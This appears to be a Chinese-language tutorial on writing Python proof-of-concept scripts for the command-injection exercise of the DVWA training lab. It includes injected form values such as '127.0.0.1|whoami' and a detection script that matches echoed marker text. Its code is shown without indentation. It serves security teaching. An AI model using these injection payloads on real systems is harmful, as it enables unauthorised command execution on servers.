简单练习,DVWA靶场开始
首先分析数据包部分
完整的数据包
POST /DVWA-master/vulnerabilities/exec/ HTTP/1.1
Host: 192.168.52.166:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://192.168.52.166:81
Connection: keep-alive
Referer: http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/
Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
Upgrade-Insecure-Requests: 1
POST数据
ip=127.0.0.1|whoami
Submit=Submit
正常的请求脚本
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|whoami",
"Submit":"Submit"}
response = requests.post(URL,data,allow_redirects=False)
print("状态{}".format(response.status_code))
print("302跳转地址{}".format(response.next.url))
脚本中需要有的东西
目标,post数据,
写入request中,然后输出response信息
不得不提之前面试官问过我写poc脚本需要用到什么库,服了。
由于没有加入用户验证信息,所以被跳转到登陆页面
接下来加入请求的cookie
Cookie: PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|whoami",
"Submit":"Submit"}
header = {"cookie":"PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL,data,allow_redirects=False,headers=header)
print("状态{}".format(response.status_code))
if(response.status_code == 302):
print("302跳转地址{}".format(response.next.url))
如果想输出内容
print("text{}".format(response.text))
根据上述总结了写poc的需要
写出快速检测漏洞脚本
检测原理:如果回显的内容中有自定义的字符,证明有问题
import requests
URL = "http://192.168.52.166:81/DVWA-master/vulnerabilities/exec/"
data = {"ip":"127.0.0.1|echo wangxinyu",
"Submit":"Submit"}
header = {"cookie":"PHPSESSID=4vc9olk96pl29lune41krov6n5; security=low"}
response = requests.post(URL,data,allow_redirects=False,headers=header)
print("状态{}".format(response.status_code))
print("text{}".format(response.text))
if response.status_code == 200 and response.text.find("wangxinyu") != -1:
print("[*] {} is weak".format(URL))
else:
print("[x] {} is safe".format(URL))
if(response.status_code == 302):
print("302跳转地址{}".format(response.next.url))
if response.status_code == 200 and response.text.find("wangxinyu") != -1:
脚本意思如果在回显内容中找到wangxinyu,则证明有问题
输出特定位置特定信息
# coding=utf-8
import requests
url = "http://192.168.17.5/vulnerabilities/exec/"
# Cookie: PHPSESSID=07ffg4rcbufo5gekqch8v86226; security=low
headers = {"cookie": "PHPSESSID=3eabqr5lprmsir8n0211bolpn1; security=low"}
data = {"ip": "192.168.111.129&&echo sechelper", "Submit": "Submit"}
# 禁止跳转 allow_redirects = False
response = requests.post(url, data, allow_redirects=False, headers=headers, timeout=5)
if response.status_code == 200:
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.text, 'lxml')
# 在html找到第一个pre标签并返回,取出内容就是命令执行的结果
pre = soup.find("pre")
print("[*] response {}".format(pre.text))
print("Detection completed...")
使用爬虫库去搜索pre内容
from bs4 import BeautifulSoup
soup = BeautifulSoup(response.text, "html.parser")
# 在html找到第一个pre标签并返回,取出内容就是命令执行的结果
pre = soup.find("pre")
print("[*] response {}".format(pre.text))
pre为输出内容的标签
输出结果
总结:写poc
先登录进去
登录需要目标,post数据,cookie写入header
再找要显示的东西
找标签,正则匹配页面漏洞
漏洞检测思路:
有回显的情况使用匹配函数find去查找回显内容,查找自定义的字符
无回显的情况下一篇文章介绍